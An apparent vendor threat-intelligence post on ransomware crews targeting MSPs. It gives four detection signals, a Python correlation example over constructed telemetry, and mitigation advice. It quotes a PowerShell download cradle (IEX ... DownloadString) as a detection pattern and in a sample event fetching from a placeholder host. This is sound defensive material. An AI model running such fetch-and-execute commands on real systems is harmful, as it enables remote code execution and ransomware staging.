The MSP supply-chain shift: ransomware-as-a-vendor
A ten-week look at how four ransomware crews are explicitly targeting MSPs as their preferred initial-access vector — and the four telemetry signals that catch it before customer environments ignite.
What’s changed
Ransomware crews have figured out that compromising one MSP unlocks dozens of downstream SMBs with shared tooling and shared credentials. The shift over the past ten weeks: four named crews now explicitly target MSP technicians as their preferred initial-access vector, knowing the access path inside an MSP is usually a flat domain with privileged RMM credentials cached on every technician laptop.
Why MSPs are the target
A typical MSP has:
- Privileged credentials to 30–200 customer environments cached locally
- Centralized RMM tools (ConnectWise, NinjaOne, Datto, Kaseya) with persistent agents on customer endpoints
- Often, a single shared password vault used by every technician
- A help-desk culture that trains staff to click and respond fast
That stack means: phish one technician, get credentialed access to many SMBs, deploy ransomware in parallel on a Friday afternoon.
The four telemetry signals that catch it early
- RMM agent invokes powershell.exe with a download cradle (IEX (New-Object Net.WebClient).DownloadString(...)). Legitimate RMM rarely does this; ransomware staging almost always does.
- Multiple simultaneous outbound TLS connections from RMM-managed endpoints to a previously-unseen autonomous system. Legitimate fan-out goes to known vendor ASNs.
- A scheduled task creation event on a customer endpoint that originated from the MSP’s tenant within the last 6 hours. Routine maintenance is rare; ransomware staging is common.
- Credential vault read events outside business hours in the MSP’s password manager (1Password, Bitwarden Enterprise, etc.).
Any one of those by itself can be benign. Two firing within 90 minutes of each other has been pre-incident in every case we’ve reviewed.
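The four signals and the 90-minute pairing rule above, as an added Python example (not Carbynix's CBNX-MSP-101 rule pack or any real SIEM content): it classifies constructed telemetry events into the four signals and raises an alert only when two different signals land within 90 minutes of each other. The RMM parent-process names, the business-hours window, the fan-out threshold of three hosts within five minutes, and the event field names are assumptions.

```python
import re
from datetime import datetime, timedelta
RMM_AGENTS = {"screenconnect.clientservice.exe", "ninjarmmagent.exe"}  # assumed agent parents
CRADLE = re.compile(r"(IEX|Invoke-Expression).*Download(String|File)", re.I)
KNOWN_ASNS, FANOUT_MIN, FANOUT_WINDOW = {64500, 64501}, 3, timedelta(minutes=5)  # constructed
BUSINESS_HOURS, PAIR_WINDOW = range(8, 19), timedelta(minutes=90)  # assumed 08:00-18:59 local

def classify(ev):
    """Signals 1, 3 and 4 fire on a single event; signal 2 needs cross-host aggregation."""
    if (ev["type"] == "process" and ev["image"].lower().endswith("powershell.exe")
            and ev["parent"].lower() in RMM_AGENTS and CRADLE.search(ev["cmdline"])):
        return "rmm_download_cradle"
    if (ev["type"] == "schtask" and ev["origin"] == "msp-tenant"
            and ev["ts"] - ev["session_start"] <= timedelta(hours=6)):
        return "msp_originated_schtask"
    if ev["type"] == "vault_read" and ev["ts"].hour not in BUSINESS_HOURS:
        return "afterhours_vault_read"
    return None

def signals(events):
    """All firings as sorted (timestamp, name); signal 2 = TLS fan-out to an unseen ASN."""
    hits = [(ev["ts"], s) for ev in events if (s := classify(ev))]
    by_asn = {}
    for ev in events:
        if ev["type"] == "netconn" and ev["asn"] not in KNOWN_ASNS:
            by_asn.setdefault(ev["asn"], []).append(ev)
    for conns in by_asn.values():
        stamps, hosts = [c["ts"] for c in conns], {c["host"] for c in conns}
        if len(hosts) >= FANOUT_MIN and max(stamps) - min(stamps) <= FANOUT_WINDOW:
            hits.append((min(stamps), "unseen_asn_fanout"))
    return sorted(hits)

def correlate(events, window=PAIR_WINDOW):
    """Pre-incident alert = two different signals within `window`; a lone signal is ignored."""
    hits, alerts = signals(events), []
    for i, (t1, s1) in enumerate(hits):
        for t2, s2 in hits[i + 1:]:
            if t2 - t1 > window: break  # hits are time-sorted, so nothing later can pair
            if s1 != s2:
                alerts.append((s1, s2, int((t2 - t1).total_seconds() // 60)))
    return alerts
T = datetime(2025, 3, 14, 16, 5)  # constructed Friday-afternoon timestamps
SAMPLE = [  # constructed telemetry, not real customer data
    {"type": "process", "ts": T, "parent": "NinjaRMMAgent.exe", "image": "powershell.exe",
     "cmdline": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"},
    {"type": "schtask", "ts": T + timedelta(hours=1), "origin": "msp-tenant",
     "session_start": T - timedelta(hours=1)},
    {"type": "vault_read", "ts": T.replace(hour=22)},  # after hours, but no partner signal
] + [{"type": "netconn", "ts": T + timedelta(minutes=20 + i), "host": h, "asn": 64512}
     for i, h in enumerate(["ws01", "ws02", "ws03"])]
```

Running `correlate(SAMPLE)` yields three paired alerts among the cradle, fan-out and scheduled-task signals, while the 22:05 vault read fires alone and produces none.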
What to do this week (if you’re an MSP)
- Enable phishing-resistant MFA (FIDO2 hardware keys) for every technician account, no exceptions.
- Move privileged RMM credentials out of laptops and into a dedicated PAM with checkout-on-use.
- Set the four signals above as detections in your own SIEM — Carbynix ships them as rule pack CBNX-MSP-101 for partner MSPs.
What to do this week (if you’re an SMB whose MSP holds your keys)
- Ask your MSP for their most recent SOC 2 Type II report or equivalent. If they shrug, that is the answer.
- Ask which RMM agent runs in your environment, and whether they have alerting on the four signals above.
- Verify your backup vendor is separate from your MSP. If the same MSP that runs your endpoint protection also runs your backup, you have one ring of trust where you should have two.
The math, plainly
An MSP-vector ransomware incident typically affects 8–40 downstream SMBs. Per-customer cost lands around $260K (IBM 2024 SMB band). Implementing the four detections above on the MSP side costs ~$15K and a week of engineering time. The math, again, is not complicated.
Drafted by Carbynix’s structured-reasoning pipeline from CISA bulletins, vendor threat intelligence, and ten weeks of customer-environment telemetry across our partner-MSP base. Errors? Tell us — we correct in 24 hours.